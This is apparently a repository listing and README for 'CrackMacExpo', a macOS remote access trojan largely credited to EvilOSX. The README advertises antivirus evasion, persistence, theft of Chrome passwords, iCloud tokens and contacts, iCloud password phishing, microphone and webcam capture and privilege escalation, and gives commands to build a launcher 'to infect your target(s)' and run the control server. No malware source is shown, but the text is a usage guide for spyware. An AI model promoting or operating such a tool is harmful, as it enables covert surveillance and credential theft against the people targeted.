https://github.com/byt3n33dl3/crackmacexpo

The most advanced GUI frontend && CLI RAT for MacOS and OSX distro, Remote Access Tool. Penetrate the SSL and Security system of Unix with sharp IPA's malware, specialized for Apple. It can also retrieve iCloud Tokens, Contacts, and search engine Passwords History's.
https://github.com/byt3n33dl3/crackmacexpo

crackmacexpo linux macos offensive osx pentesting post-exploitation python3 rat remote-access-tool reverse-shell shellcode

Last synced: about 2 months ago
JSON representation

The most advanced GUI frontend && CLI RAT for MacOS and OSX distro, Remote Access Tool. Penetrate the SSL and Security system of Unix with sharp IPA's malware, specialized for Apple. It can also retrieve iCloud Tokens, Contacts, and search engine Passwords History's.

• Host: GitHub
• URL: https://github.com/byt3n33dl3/crackmacexpo
• Owner: byt3n33dl3
• License: gpl-3.0
• Created: 2024-05-06T19:52:08.000Z (8 months ago)
• Default Branch: main
• Last Pushed: 2024-09-15T12:39:41.000Z (4 months ago)
• Last Synced: 2024-11-08T10:03:06.069Z (about 2 months ago)
• Topics: crackmacexpo, linux, macos, offensive, osx, pentesting, post-exploitation, python3, rat, remote-access-tool, reverse-shell, shellcode
• Language: C
• Homepage: https://book.hacktricks.xyz/macos-hardening/macos-security-and-privilege-escalation
• Size: 20.3 MB
• Stars: 21
• Watchers: 1
• Forks: 0
• Open Issues: 0
• Metadata Files:
  • Readme: README.md
  • Funding: .github/FUNDING.yml
  • License: LICENSE
  • Code of conduct: CODE_OF_CONDUCT

Awesome Lists containing this project

README

        
# CrackMacExpo

GUI frontend and CLI **RAT**, a Remote Access Tool for **MacOS** or **OSX** distro. Penetrate the SSL and Security system of OSX distro with a sharp IPA's Malware, Specialized for Apple.









MacOS & OSX







  

      

  

  

      

  

  

      

  

  

    

  

  

      

  



# Features

- Emulate a terminal instance

- Simple extendable [Module](https://github.com/Marten4n6/EvilOSX/blob/master/CONTRIBUTING.md) system

- Undetected by Anti Virus ( OpenSSL [AES-256](https://en.wikipedia.org/wiki/Advanced_Encryption_Standard) encrypted payloads )

- Persistent

- GUI and CLI support

- Retrieve Chrome passwords

- Retrieve iCloud tokens and contacts

- Monitor the clipboard

- Retrieve browser history ( Chrome and Safari )

- [Phish](https://i.imgur.com/x3ilHQi.png) for iCloud passwords via iTunes

- iTunes ( iOS ) backup enumeration

- Record the microphone

- Take a desktop screenshot or picture using the webcam

- Attempt to get root via local privilege escalation

## How To Use

```python

# Clone or download this repository

$ git clone https://github.com/pxcs/CrackMacExpo

# Go into the repository

$ cd CrackMacExpo

# Install dependencies required by the server

$ sudo pip install -r requirements.txt

# Start the GUI

$ python crackmacexpo.py

# Lastly, run a built launcher on your target(s)

```

**Warning:** Because payloads are created unique to the target system ( Automatically by the server ), the server must be running when any bot connects for the first time.

## Advanced users

There's also a CLI for those who want to use this over SSH:

```python

# Create a launcher to infect your target(s)

$ python crackmacexpo.py --builder

# Start the CLI

$ python crackmacexpo.py --cli --port 443

# Lastly, run a built launcher on your target(s)

```

## Issues

Feel free to submit any issues or feature requests [here](https://github.com/pxcs/CrackMacExpo/issues).

## Contribution

For a simple guide on how to create modules click [here](https://github.com/pxcs/CrackMacExpo).

## Certifications Related

>##### OSMR | Offensive Security macOS Researcher

>##### GXPN | GIAC Exploit Researcher and Advanced Penetration Tester

>##### eCPPT | INE Security Certified Professional Penetration Tester

>##### eCPPTv2 | INE Security Certified Professional Penetration Tester v2

>##### CᴵEH (Master) | Certified Ethical Hacker (Master)

>##### LᴵPT (Master) | Licensed Penetration Tester (Master)

# Credits

- The awesome [Empire](https://github.com/EmpireProject) project

- Shoutout to [Patrick Wardle](https://twitter.com/patrickwardle) for his awesome talks, check out [Objective-See](https://objective-see.com/)

- manwhoami for his projects: OSXChromeDecrypt, MMeTokenDecrypt, iCloudContacts

- The slowloris module is pretty much copied from [PySlowLoris](https://github.com/ProjectMayhem/PySlowLoris)

- [urwid](http://urwid.org/) and this [code](https://github.com/izderadicka/xmpp-tester/blob/master/commander.py) which saved me a lot of time with the CLI

- Logo created by [GangstaCrew](https://www.behance.net/byt3bl33d3r)

- Repo [Marten4n6](https://github.com/Marten4n6/EvilOSX/)

# Contact Me

- [email protected]